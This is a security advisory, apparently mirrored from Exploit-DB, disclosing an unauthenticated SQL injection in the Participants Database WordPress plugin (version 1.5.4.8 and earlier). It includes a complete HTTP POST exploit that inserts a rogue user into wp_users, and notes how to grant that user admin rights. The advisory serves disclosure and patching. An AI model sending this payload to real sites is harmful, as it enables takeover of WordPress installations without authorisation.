WordPress Plugin Participants Database 1.5.4.8 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Yarubo Research Team
  日期： 2014-06-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33613/

• Yarubo #1: Arbitrary SQL Execution in Participants Database for WordPress
  =========================================================================
  
  Program: Participants Database <= 1.5.4.8
  Severity: Unauthenticated attacker can fully compromise the WordPress
  installation
  Permalink: http://www.yarubo.com/advisories/1
  
  — Info —
  
  Participants Database is a popular WordPress plugin that offers the
  functionality needed to build and maintain a database of people. As of
  today the plugin has been downloaded 92,089 times.
  
  — Vulnerability details —
  
  1. Due to insufficient privilege checks it is possible for anonymous
  (unauthenticated) users to trigger some administrative actions If any of
  the shortcodes is used (e.g. signup page).
  
  2. The action "export CSV" takes a parameter called "query" that can
  contain an arbitrary SQL query. This means that an unauthenticated user can
  execute arbitrary SQL statements (e.g. create an admin user, read or write
  files, or execute code depending on the MySQL user privileges).
  
  
  — Exploit —
  
  Add a user to wordpress as follows (if you want an admin user, also add
  admin privileges to wp_usermeta):
  
  
  POST /wordpress/pdb-signup/ HTTP/1.1
  Host: www.example.com
  Content-Length: 789
  (…)
  Content-Type: multipart/form-data;
  boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN
  
  ------WebKitFormBoundaryuoACADe1C2IFWMxN
  Content-Disposition: form-data; name="action"
  
  output CSV
  ------WebKitFormBoundaryuoACADe1C2IFWMxN
  Content-Disposition: form-data; name="CSV_type"
  
  participant list
  ------WebKitFormBoundaryuoACADe1C2IFWMxN
  Content-Disposition: form-data; name="subsource"
  
  participants-database
  ------WebKitFormBoundaryuoACADe1C2IFWMxN
  Content-Disposition: form-data; name="query"
  
  INSERT INTO wp_users
  (ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
  VALUES
  (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);
  
  ------WebKitFormBoundaryuoACADe1C2IFWMxN
  
  
  
  — Solution —
  
  This issue has been fixed in version 1.5.4.9. Download the newest version
  from:
  
  Participants Database
  
  
  
  — Credit —
  
  
  Yarubo Research Team
  research [at] yarubo.com
  
  Network Security Scan:
  http://www.yarubo.com/
  
  Free Heartbleed Scan:
  http://www.yarubo.com/heartbleed